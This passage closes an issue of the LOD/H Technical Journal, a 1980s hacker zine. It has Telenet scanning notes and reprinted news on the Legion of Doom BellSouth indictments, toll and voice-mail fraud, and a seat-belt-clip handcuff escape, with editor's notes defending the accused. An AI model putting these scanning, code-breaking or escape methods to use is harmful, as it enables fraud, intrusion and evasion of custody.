rejecting until you connect to the sub address 74! Imagine trying to go
that far on each of the thousands of rejecting and illegal addresses I
obtained in my scanning! Maybe some other time.

There are several areas that I scanned that are not in this directory.
Mainly, these are areas where I didn't find anything. So you don't waste
your time, all hosts in Canada are served through Datapac, so there is
nothing in areas prefixed with a Canadian area code. There are also many
US areas that I guess are still striving for the Industrial Revolution, and
therefore have no systems online. There are also several privately owned
prefixes that I didn't scan just because it would be a pain in the ass,
above and beyond the pain involved doing the main scanning. The major ones
are 622 (NYNEX), 891, 892, 893, & 894 (OWNERS UNKNOWN). There are also a
few others that go up and down daily, depending upon their mood. I
wouldn't suggest that you all immediately start hacking these prefixes;
mainly because you will need an ID just to get a response other than
refused collect connection.

Lastly, if anyone finds any errors in the directory, or finds anything I
omitted, let me know, and I'll revise it. Also, if anyone would like a
copy of the telix script I used to do this scanning, let me know. This was
a bitch to do, but I think it was worth the trouble. The next update won't
be for a year, as this should suffice for at least that long.

==============================================================================
End of Second Half of LOD/H Telenet Directory, Rev. #5
==============================================================================
The LOD/H Technical Journal, Issue #4: File 10 of 10.

NETWORK NEWS AND NOTES
----------------------

The Network News and Notes file contains reprints of articles that are of
interest to the majority of our intended readers. In this installment we
borrowed heavily from the CFCA (Communications Fraud Control Association)
Communicator since the newsletter deals specifically with issues relevant to
our readers. The CFCA is "a nonprofit educational organization founded in
1985 to help the telecommunications industry combat fraud."

Overall, do not let the titles mislead you. Every article contains interesting
and we hope useful information. Be sure to take the time and read into them
before skipping. Some are a little old but better late than never. If anyone
comes across any articles of interest, we would like to know about them. One
more note, all comments within brackets [], are remarks made by one of
the TJ editors.

The first two articles, as was stated in the Introduction, relate the various
trouble some noted members of the community ran into.

______________________________________________________________________________

Source: The Wall Street Journal
Issue: Wednesday, February 7, 1990
Title: Computer Hackers Accused of Scheme Against BellSouth
Author: Thomas M. Burton

CHICAGO--Federal grand juries in Chicago and Atlanta indicted four computer
hackers in an alleged fraud scheme that authorities said could potentially
disrupt emergency "911" telephone service throughout nine Southern States.

The men, alleged to be part of a closely knit cadre of computer hackers
known as the Legion of Doom, gained access to the computer system, controlling
telephone emergency service of BellSouth Corp., the Atlanta-based
telecommunications giant.

BellSouth, through two subsidiaries, oversees phone service in Alabama,
Mississippi, Georgia, Tennessee, Kentucky, Louisiana, Florida, and the
Carolinas.

The Chicago indictment said members of the Legion of Doom are engaged in
disrupting telephone service by entering a telephone company's computers and
changing the routing of telephone calls. The hackers in the group also
fraudulently obtain money from companies by altering information in their
computers, the indictment said.

The hackers transferred stolen telephone-computer information from
BellSouth to what prosecutors termed a "computer bulletin board system"
in Lockport, Ill. In turn, the men planned to publish the computer data in a
hackers' magazine, the grand jury charged.

-----EDITOR'S NOTES:
As always, ignorance and falsehoods are abound in most articles of this
nature. For the record, NO TELEPHONE SERVICE WAS INTENTIONALLY DISRUPTED DUE
TO THE ACCUSED MEMBERS. Furthermore, NO MONEY FROM COMPANIES WAS EVER
FRAUDULENTLY OBTAINED BY ALTERING INFORMATION IN THEIR COMPUTERS. These are
the typical WILD accusations made by law enforcement and further distorted
by the media in such cases. As for the bbs is Lockport, Ill. well it was
simply a legitimate information storage and retrieval system used by many,
many people for legitimate purposes of information exchange. It would be very
time consuming for the operator of said system to check every file on the
system as it was a UNIX based system with a lot of disk space. The hacker
magazine stated above is simply Phrack, Inc. put out by Knight Lightning and
Taran King. More comments after next article.

_____________________________________________________________________________

Source: ComputerWorld
Issue: 1990
Title: Babes in high tech toyland nabbed
Author: Michael Alexander

CHICAGO--- The U.S. Justice Department escalated its ware against computer
crime last week with two indictments against members of an alleged computer
hacker group, who are charged with stealing a copy of a 911 emergency computer
program from BellSouth Telephone Co., among several other crimes.

In a seven-count indictment returned in Chicago, Robert X, 20 also known as
"The Prophet", is alleged to have used a computer to steal a copy of a
computer program owned and used by BellSouth that controls emergency calls to
the police, fire, ambulance and emergency services in cities throughout nine
Southern states. According to the indictment, after X stole the program --
valued at $79,449 -- he uploaded it to a computer bulletin board.

The Chicago indictment further alleges that Craig Y, 19, also known as
"Knight Lightning" downloaded the 911 program to his computer at the
University of Missouri in Columbia, Mo., and edited it for publication in
"Phrack", a newsletter for computer hackers.

X and Y allegedly intended to disclose the stolen information to other
computer hackers so that they could unlawfully access and perhaps disrupt
other 911 services, the Chicago indictment charged.

In a second indictment returned in Atlanta, X and two others were charged
with additional crimes related to BellSouth systems.

All four hackers allegedly are members of the Legion of Doom, described in
the indictments "as a closely knit group of about 15 computer hackers", in
Georgia, Texas, Michigan and several other states.

BellSouth spokesmen refused to say when or how the intrusion was detected
or how a computer hacker was able to lift the highly sensitive and proprietary
computer program.

"Hopefully, the government's action underscores that we do not intend to
view this as the work of a mischievous prankster playing in a high-tech
toyland", one spokesman said.

A source within BellSouth said that much of what the hacker took was
documentation and not source code. "They did not disrupt any emergency
telephone service, and we are not aware of any impact on our customers", the
source said.

William Cook, an assistant U.S. attorney in Chicago, declined to comment on
whether 911 service was actually disrupted. "It is a matter of evidence,", he
said.

Cook also said that while the two hackers are charged with carrying out
their scheme between December 1988 and February 1989, the indictment came
after a year-long investigation. Though Cook refused to say how the hackers
were discovered or caught, it is believed that after the initial penetration
by one of the hackers, an intrusion task force was set up to monitor
subsequent security breaches and to gather evidence against the hackers.

If convicted on all counts, X faces a prison sentence of up to 32 years and
a maximum fine of $222,000, and Y faces a prison sentence of 31 years and a
maximum fine of $122,000.

The Atlanta indictment charged Robert X, Adam Z, 22 known as "The Urvile"
and also "Necron 99", and Frank XYZ, 23 known as "The Leftist", with eight
counts each of computer fraud, wire fraud, access code fraud and interstate
transportation of stolen property, among other crimes.

If convicted, each defendant faces up to five years imprisonment and a
$250,000 fine on each count. The three illegally accessed Bellsouth computers
and obtained proprietary information that they distributed to other hackers,
the indictment alleged.

----EDITOR's NOTES: As is confirmed in this article, no telephone service
was disrupted. The extent of BellSouth's inadequacy regarding security matters
was not detailed in these articles. Here is a rundown of what may have
possibly happened: BellSouth's SBDN (Southern Bell Data Network) which is a
modified Telenet network that contains hundreds if not thousands of network
nodes (individual systems) may have been accessed during which time the system
that controls the entire network may have been possibly compromised. This
would allow someone to access just about any system on the network, since
Bellsouth consolidated most of their individual systems onto a large network
(economically not a bad idea, but a security nightmare indeed). This may allow
one to stumble onto systems dealing with 911. Since it may be interesting to
learn how such a system operates and how the 'automatic trace' is
accomplished, the documentation would be of some help. No need for any actual
programs however. Possibly, maybe, an article paraphrased the operation of 911
and was possibly to be distributed through the Phrack, Inc. newsletter.

The last names of those involved were omitted. Go look them up for yourself if
you think its that important.

Just for the record: KNIGHT LIGHTNING NEVER WAS A MEMBER OF LOD. Yet another
error in the reporting...LOD has half the 15 supposed number of members.

Another article followed the above one on the same page, by the same author:

Last week's disclosure of an alleged hacker theft of highly sensitive
BellSouth Telephone Co. documentation for a nine-state 911 emergency system
was the second serious security breach of a telephone company network to come
to light in as many months.

In January, a trio of hackers was able to penetrate computer systems at
Pacific Bell Telephone Co. and eavesdrop on conversations and perpetrate other
criminal acts. [CW, Jan. 22].

Just how vulnerable are the nation's telephone systems to hacker attacks?
Spokesmen for BellSouth and Pacific Bell insist that their systems are secure
and that they and other telephone companies routinely assess their
vulnerability to hackers.

"Security is being constantly changed, every intrusion is studied,
passwords are changed," said Terry Johnson, manager of media relations for
BellSouth in Atlanta.

Johnson however, declined to say how the hackers allegedly were able to
lift the documentation to a 911 emergency communication services program.

"It is a rather serious computer security breach," said Richard Ichikawa, a
Honolulu based telecommunications consultant who specializes in designing and
installing 911 emergency systems. Stealing documentation, as the Legion of
Doom member is alleged to have done, many not be a particularly difficult task
for a savvy hacker, he said.

Taking the actual program, while certainly possible, would be much more
challenging, however. The computer the controls enhanced 911 service is "quite
isolated" from the calling public, Ichikawa said.

A recently published report to Congress by the Office of Technology
Assessment suggested that the security and survivability of the nation's
communication infrastructure is at greater risk to hacker attacks than ever
before. Business and government reliance on communications and information
based systems has increased, thus much more is at stake when those systems
fail, the report stated.

The increased publicity of hacker attacks may help to curb attacks by
hackers, said Sanford Sherizen, a security consultant at Data Security
Systems, Inc., in Natick, Mass.

Some law enforcement officials complain that the nation's telephone firms
do not cooperate as readily as they would expect when attacks of this sort
occur. "They [telecommunications providers] are the single biggest headache
law enforcers have right now," said Gail Thackery, Arizona stat assistant
district attorney.

Regional Bell operating companies contacted last week disputed that
assertion.

_____________________________________________________________________________

Source: CFCA (Communications Fraud Control Association) Communicator
Issue: February-March 1989
Title: But are LD networks safe?

Spread over vast distances and segmented by switches guarded by their own
passwords, long distance networks are generally safe from virus attacks.
According to Henry Kluepfel, Bellcore district manager of Security Planning
intruders can easily attain the same information that is available to vendors
and service providers. "If passwords are not changed regularly, intruders
can quickly wreak havoc".

Scott Jarus, division director of Network Loss Prevention for Metromedia,
and a member of CFCA's Board of Directors, says that users of "outboard"
computer systems should not be assigned high level access to their company's
switches or networks. "Non-proprietary hardware and software that handle
such functions as billing collection and network database management are
targets for unauthorized access and viruses", he says.

Mr. Kluepfel says that once hackers have the documentation they can send
details on how to crash the systems to hundreds of bulletin boards. "We
found that many system administrators didn't realize manufacturers install
rudimentary default passwords."

Bellcore encourages using sophisticated codes and applying a variety of
defenses. "Don't simply rely on a dialback modem, or a good password", says
Mr. Kluepfel. "Above all, don't depend on a system to always perform as
expected. And remember that new employees don't know the administrative
measures the operator knows".

Managers should advise clients on any needed internal analysis and
investigations, and keep abreast of technological advances when planning
their defenses.

_____________________________________________________________________________

Source: Same as above
Title: Secure those gray boxes

After the FCC mandated that telcos provide test modes on the gray
[or green (ed. note)] connection boxes usually found outside structures,
there have been instances of persons surreptitiously clipping on handsets
or snapping in modular connections (RJ-11) to make long distance calls on the
residents' line. CFCA advises customers to padlock their boxes to deter such
thievery.

John Venn, manger of Electronic Operations at PacBell's San Francisco
office, reports that the boxes they install have separate connections for
company and customer use, so that users have the option of securing access
to their portion. PacBell's side has a built-in lock, while customers have
padlock hasps.

_____________________________________________________________________________

Source: Same as above
Title: Product Description: Pen-Link analysis software
Author: Mike Murman

Since 1986, Pen-Link, Ltd. of Lincoln Neb. has been producing software
that supports telecom investigations. Last July, the company introduced an
updated version of Pen-Link, a two-year-old program that accepts data from
most Dialed Number Recorders (DNRs) manufactured today, pools that information
into a common database structure, and allows the user to determine the calling
patterns and the codes that have been compromised.

In today's ever-expanding telecommunications environment there is a need
for faster identification and documentation of abuser call patterns to assure
successful prosecutions. In applications of DNRs for investigative purposes,
Pen-Link programs have reduced the time normally needed to input, analyze and
report call data by as much as 90 percent. The result is improved productivity
and quicker response to customers' needs.

The Pen-Link 2.0 program also provides several related features. First, it
is a communications program, meaning that if you are using a DNR with modem
capability or RS232 communication ports, the program can automatically load
your call records into a PC, eliminating the time needed to key-in call
record data.

Second, Pen-Link has an autoload format section that takes call records
you have transferred and puts them into a standard record format. This is an
important feature, given that the program supports multiple types of DNR
hardware that all have unique call data formats.

In short, you can use any combination of DNRs in your investigations with
Pen-Link and all data will be compatible. Furthermore, the program allows
you the flexibility of purchasing new DNRs of any type, and not worry about
duplicating your software expense or learning new software programs. [Notice
how he keeps saying "you" in this article? (ed.)]

Finally, Pen-Link enables you to analyze and report on your call record
information. There are 15 different call analysis reports and 6 different
graphic reports. If these reports do not meet your needs, the program has a
report generator that allows you to customize your analysis and reports.

Pen-Link is a dedicated program written in Turbo Pascal. The company
elected to start from scratch and develop its own software, rather than
simply adapting standard applications. There are two reasons for this
approach: dedicated software programs run more efficiently, so that if a
hacker is generating thousands of call records and you want to analyze and
report this information, the program can provide a report much faster than if
you were processing the data manually.

The second reason behind this strategy is that users only need to learn
and understand the options for the pop-up menu format. Pen-Link also supports
color monitors.

A manual editing feature allows you to enter your database and find
specific records by the criteria you have selected; then review and edit the
data. Manual editing also allows you to enter call data from old pen
registers that only produce paper strips containing call information.

Another feature, the utilities section, provides several options to
manage call information stored in your computer. This allows you to archive
information to disk, then reload it later when it is needed. If your data
files become corrupted, you can reconstruct and reformat them by using the
utilities section. And if you wish to use your call data information in
another application program, Pen-Link's utilities allow you to create an
ASCII text file of call information, which then can be read by these programs.
Furthermore, the program can accept ASCII text files from other DNR software
programs.

The program calls for an IBM or compatible PC equipped with a hard drive,
operating under MS-DOS 2.1 or higher. Pen-Link currently supports the
following DNRs: JSI, Mitel, Racom, Voice ID, Hekimian, Bartec, Pamco, HDS,
and Positive Controls. If you are using a DNR that is not listed, Pen-Link,
LTD will program its software so it can automatically load call records from
your equipment.

The use of DNRs that automatically transfer call record data saves your
security department considerable investigative time. Pen-Link's mission is
to provide telcom security departments with a sophisticated investigative
software tool that is easy to use, flexible and compatible.

_____________________________________________________________________________

Source: Same as above
Title: Extended Ky. case resolved

A 21 year-old Kentucky man was successfully convicted October 27 on 14
counts of computer and toll fraud under a number of state statutes. The
defendant, John K. Detherage, pleaded guilty to using his personal computer to
identify authorization codes in order to place unauthorized long distance
calls valued at $27,000.

Detherage had been indicted a year earlier by an Oldham County grand jury
on six felony counts related to the scam and two misdemeanor counts of
possessing stolen personal identification and calling card numbers. He was
later charged with two additional counts of possessing stolen PINs.

Detherage originally was to have been tried in February 1988, but the case
was postponed when he pleaded guilty. He was sentenced at the Oldham County
Circuit Court at LaGrange to pay $12,000 in restitution, and relinquish all
computer equipment and software to the court.

His charges included theft of services over $100; theft of services; four
counts of unlawful access to a computer, second degree; possession of stolen
credit or debit cards, and six counts of unlawful access to a computer. Four
other counts were dismissed.

Kentucky has a number of statutes that can be applied to theft of telephone
services. Chapter 514.060 addresses theft of services, while 514.065 describes
the possession, use or transfer of a device for the theft of services. Theft
of services is defined to include telephone service, and the defendant was
charged with two counts under 514.060.

Detherage was also charged with 10 counts (six felony and four misdemeanor)
under Chapter 434.580, which relates to the receipt of stolen credit cards.
Kentucky interprets computer crime as involving accessing of computer systems
to obtain money, property or services through false or fraudulent pretenses,
representations or promises.

_____________________________________________________________________________

Source: Same as above
Title: Industry Overview

As major players in the telecom industry shore up the defenses on their
telephone and computer networks, criminals [who, us?] are turning to smaller,
less protected companies [its called survival of the fittest]. In 1988, the
use of stolen access codes to make free long distance calls continued to be
the favorite modus operandi among network intruders throughout the industry,
although code abuse leveled off or declined among large carriers with well
funded security organizations and substantial technical apparatus to defeat
most toll and network fraud.

However, some resellers and PBX owners are being victimized by fraud of all
types, probably because most use access codes with only six or seven digits.
Such vulnerable systems will continue to be used by abusers to route long
distance calls overseas. Fraudulent calls placed on a compromised system
quickly accumulate charges the system owner must eventually pay.

Many PBX's also lack effective systems able to detect irregular activities
and block fraudulent calls. Add to this the fact that several carriers may be
handling the inbound and outbound WATS lines, and investigator's jobs can
really become complex.

The sharp increase in the abuse of voice store-and-forward systems, or
voice mail, that began alarming owners and manufacturers early last year will
continue through 1989. Last spring, traffickers began seizing private voice
mail systems to coordinate drug shipments. Messages can be quickly erased when
they are no longer needed. Dealers have been receiving mailbox numbers by
pager, then calling in recorded messages from public telephones.

No matter how long a security code may be, if intruders obtain an 800
number to a voice mail system they can program a computer and take the time to
break it, because it won't cost them anything. Once accessed through a PBX,
intruders can exchange stolen lists of long distance access codes, usually
without the system owner's knowledge.

The time it takes abusers to break into a voice mail system is
proportionate to the number of digits in a security code. A four-digit code
can, for example be beaten by a skilled computer operator in slightly over a
minute. [Clarification, this is probably through the use of default security
codes, not sequential or random scanning techniques. ed.] One problem is that
voice mail customers don't often know what features to select when buying a
system. And few manufactures take the initiative to advise customers of the
importance of security.

Another problem that has been around for several years, subscription fraud,
will continue into 1989, although telcos have reduced it by making customer's
applications more detailed and comprehensive [like requiring customers to
supply their credit card numbers. This way if they skip town without paying
and the credit card is valid and not maxed out, the phone company can still
recover the money owned them. ed.], and by checking out potential customers
more thoroughly. Dishonest subscribers use false identification and credit
references to obtain calling cards and services, with no intention of paying.

Intelligent software is available that aids switch and PBX owners in
identifying, screening and blocking fraudulent calls. Another precaution is
to add digits to access codes, because numbers of fewer than 10 digits cannot
withstand today's intruders. A number of carriers have already gone to 14
digits.

Some larger carriers have been sending technical representative out to
reprogram PBX's, encourage customers to install better safeguards, and advise
them to shut down their systems at night and on weekends. Customers should
also expect to see billing inserts warning of the improved defenses against
fraud.

As more companies break into the international market they will need solid
security safeguards to protect them against intrusions of their networks. A
small interexchange carrier (IC) in Alabama was hit hard recently by "phone
phreakers" soon after they opened overseas service.

Other start-ups find themselves desperately trying to play catch up after
blithely operating several years without a hitch. An IC with 30,000 customers
in Southern California increased its seven-digit access codes to ten digits
and it aggressively pursuing five groups of hackers its investigators
uncovered after discovering that company-issued personal identification
numbers were posted on computer bulletin boards.

In the final analysis, one fact emerges: widespread cooperation among
injured parties will ensure quicker results and conserve vital company
resources.

_____________________________________________________________________________

Source: PC Week April 10,1989
Title: Keep an Ear Out for New Voice Technology
Author: Matt Kramer

With the rise in digital transmission of voice and data, it's easy to
assume that voice and data have merged into a muddle of indiscriminate
material, with voice indistinguishable from data. After all, a bit's a bit,
right?

But, those people in the white lab coats keep coming up with new ways to
use voice technology.

The telephone companies are the ones poised to make the most of this
technology. U.S. Sprint recently announced that it was experimenting with the
use of "voice prints"--a recording of a verbal password that would be used to
help identify authorized subscribers using their U.S. Sprint telephone charge
cards, which would help cut down on hackers trying to steal telephone service.
Subscribers would record a voice print of a verbal password. Then, when they
were using their charge cards, they would repeat the passwords to verify their
identities.

Northern Telecom has embarked on its own efforts to bring voice-recognition
technology to public telephone service. it is selling telephone companies a
new billing service that uses voice-recognition technology to automate collect
and third-number billing calls.

Called the Automated Alternate Billing Service (AABS), the system calls the
party to be billed and "asks" if the charges will be accepted. The Northern
Telecom switch "listens" to the response and either completes the call or
informs the calling party that the charges have been refused.

Northern Telecom also plans to use voice technology to offer other
features, such as allowing the system to announce the caller's name in the
party's own voice and stating the call's origin, such as the name of a city,
a university or an institution.

The big draw for phone companies, of course, is reduction of personnel
costs, since no human operator assistance is needed. That's an option for lots
of corporate financial officers who have been attracted to automated-attendant
phone systems because they can replace a bevy of switchboard operators.

What would be interesting about the Northern Telecom technology is to see
if it can be expanded to other gear, such as private branch exchanges, and if
if can beef up the automated-attendant feature. Rather than require callers
to punch a lot of buttons to get in touch with someone, perhaps voice
recognition could be used to "listen" for a name and then direct the call to
the appropriate party. That would be especially useful in situations where you
don't know the exact extension of whomever you are calling. Trying to maneuver
around an on-line telephone directory can be a real pain in the neck.

At the same time, voice-recognition technology can be paired with voice
mail so that users can access their voice mailboxes without having to punch in
an identification number or password or to deal with a menu. It would be a lot
easier to just say, "Read messages".

There's still a lot of potential to be developed in voice technology.

_____________________________________________________________________________

Source: PC WEEK May 15, 1989
Title: MCI to Provide Transition to ISDN
Author: Matt Kramer

MCI Communications Inc. hopes to give its customers a smoother transition
to ISDN with new services that offer many of the technology's features without
requiring costly upgrades to ISDN-compatible equipment.

The communications company recently announced new Integrated Services
Digital Network and "ISDN-equivalent" services that will provide MCI customers
with network-configuration, control and management features, according to
company officials.

The equivalent services, which will be available this fall, run over
existing in-band signaling channels. True ISDN services require a separate
out-of-band D channel for signalling.

MCI's full ISDN services are scheduled for delivery in the first quarter of
next year.

The equivalent services, while not providing the full ISDN feature set, are
designed to introduce customers to the benefits of ISDN before requiring them
to make the investment in ISDN-compatible telecommunications gear, officials
said.

"While they may not want to make that expenditure now, they certainly want
to have ISDN-like services available", said Kevin Sharer, senior vice
president of sales and marketing at MCI, in Washington.

The equivalent products include the MCI 800 Enhanced Services Package,
which allows customers with dedicated access lines to receive the number of
the calling party just prior to receiving the call. This Automatic Number
Identification (ANI) is then used to query a database to bring up a customer's
account or other information, according to officials.

Northern Telecom Inc. and Rockwell International Corp. have developed new
software for their private branch exchanges that permits the switches to
handle in-band ANI transmission.

Some observers expect the equivalent services will be useful in the
evolution from existing telecommunications to ISDN. "If all you need is ANI,
then the equivalent services might be just what you want", said Claude Stone,
vice president of product development at the First National Bank of Chicago
and vice chairman of the national ISDN Users Forum.

_____________________________________________________________________________

Source: A newspaper
Date: Sometime in June
Title: Sheriff's prisoners find handcuffs are a snap to get out of
Author: unknown

Ten jail prisoners who discovered an ingenious way to escape from handcuffs
are sending alarms across the nation. Emergency bulletins will be sent to law
enforcement agencies via teletype machines nationwide. On Friday, deputies
were taking 10 prisoners from the jail downtown to another one in the city.
All were handcuffed. "When the deputy opened the back of the van, all 10 guys
were smiling and said, 'See what we did,'" the Sheriff said. Each prisoner
held up his arms to show broken handcuffs.

The culprit was a simple seat belt clip. The circular cuffs are connected
with a chain, held tightly to each cuff by a swivel-head link that moves
freely to ensure that the chain cannot be twisted when the wrists move. Seat
belt clips typically have one or two holes, or slots, that lock them into
place with the buckle. The prisoners learned that jamming the swivel-head on
the clip stops the swivel head from turning freely. "A quick twist of the
wrist, and the chain shears off at the cuff," the sheriff said.

The sheriff ordered seat belts removed from jail vans. He also ordered
that the prisoners in cruisers be handcuffed with their hands behind their
back and the seat belts locked firmly across them. Deputies often handcuffed
prisoners' hands in front of their bodies. But even if prisoners were cuffed
behind their backs, it would not be difficult for them to manipulate the
swivel head into a seat belt buckle and twist themselves free -- if they
could reach the seat belt. "This is a danger to every law enforcement officer
in the country", the sheriff said.

Handcuff manufacturers contacted Friday are studying the possibility of
redesigning the handcuffs by enlarging the swivel head or placing some type
of shroud over it. "People in jail have 24 hours a day to figure a way out"
said the sheriff.

"Although only 10 people know the technique, I guarantee that the entire
jail population will know how to do it before the day is up,". "The only
people who won't know about it is law enforcement officers". The sheriff
met Friday with representatives of several local and federal agencies. An
FBI spokesman said the escape technique will be described in the FBI's
nationally distributed LAW ENFORCEMENT BULLETIN.

Although the sheriff was grateful to learn about the technique from
prisoners who did not try to escape, he was not amused. He told deputies,
"Charge them with destruction of county property. We'll see how funny they
think that is."

_____________________________________________________________________________

Title: Federal grand jury probes Cincinnati Bell wiretapping flap
Source: Data Communications
Issue: November 1988
Author: John Bush

A federal grand jury in Ohio is investigating illegal wiretapping
allegations involving two former employees of Cincinnati Bell who claim the
telephone company ordered them for more than a decade to eavesdrop on
customers.

In addition, an attorney who filed a class-action lawsuit against
Cincinnati Bell on behalf of the people and companies who were allegedly
wiretapped, says he is trying to prove that the telephone company sold the
information gained from the electronic surveillance.

A Cincinnati Bell spokesperson denied the charges, saying they were
trumped-up by the two former employees, who are seeking revenge after being
fired by the telephone company.

The lawsuit has been filed against Cincinnati Bell Inc. on behalf of
Harold Mills, a former police lieutenant and former commander of the
Cincinnati Vice Squad, as well as a number of other individuals and companies.
Among the alleged victims mentioned in the complaint were Sen. Howard
Metzenbaum (D-Ohio) and Proctor and Gamble Co. (Cincinnati, Ohio).

Gene Mesh, the attorney who filed the lawsuit, believes the Cincinnati Bell
case is not an isolated incident but a trend...an explosion of cancer that
"this kind of thing [wiretapping] has developed its own markets."

When asked if Cincinnati Bell was selling the information gained from
tapping, Mesh said "we are proceeding along evidentiary lines to prove this."

Thus far, the civil action hinges on the testimony of two former Cincinnati
Bell employees, Leonard Gates, a supervisor, and Robert Draise, an installer
who at one time worked for Gates. Their combined testimony states that, under
the auspices of Cincinnati Bell, they conducted over 1,200 illegal wiretaps
from 1972 to the present.

According to Gates, as a result of the Proctor and Gamble wiretap, "we
were into all of P&G's databases." In addition, both Gates and Draise claim
to have been in on illegal wiretaps of General Electric Co.'s Aircraft Engines
Division near Cincinnati. Draise also claims that he was ordered to identify
all of GE's facsimile and modem lines for Cincinnati Bell.

Neither Proctor and Gamble nor General Electric would comment. However
Sen. Howard Metzenbaum's Washington, D.D., office says that the Senator
"found the news shocking and is awaiting more information to see if it
[the wiretap] actually happened.

Meanwhile Cincinnati Bell maintains that the suit and allegations are
merely Gates's and Draise's way of getting back at the phone company for
having fired them.

Cyndy Cantoni, a spokesperson for Cincinnati Bell, said that "we have heard
the allegations that we wiretapped, but if Draise or Gates did any tapping, it
wasn't done at Cincinnati Bell's request."

Cantoni also cited a letter from Cincinnati Bell President Ray Clark that
went out to all Cincinnati Bell employees in the wake of the publicity
surrounding the wiretapping accusations. The letter stated that Gates had been
warned in April 1985 against continuing an affair with an employee he had been
supervising and who had accused him [Gates] of sexual harassment, according to
Cantoni.

The letter went on to say that Gates reacted to the warning with
insubordination and threats and "carried on a campaign against the company."
As a result, Gates was fired for insubordination, says Cantoni. Robert Draise
was fired after he was convicted of misdemeanor wiretapping charges for
tapping the phone line of a friend's girlfriend, Cantoni says.

Cincinnati Bell is an independent telephone company that was allowed to
keep the "Bell" trademark after divestiture, since it is older than AT&T,
says Cantoni.

[ End of Document ]
[ End Of The LOD/H Technical Journal Issue #4 ]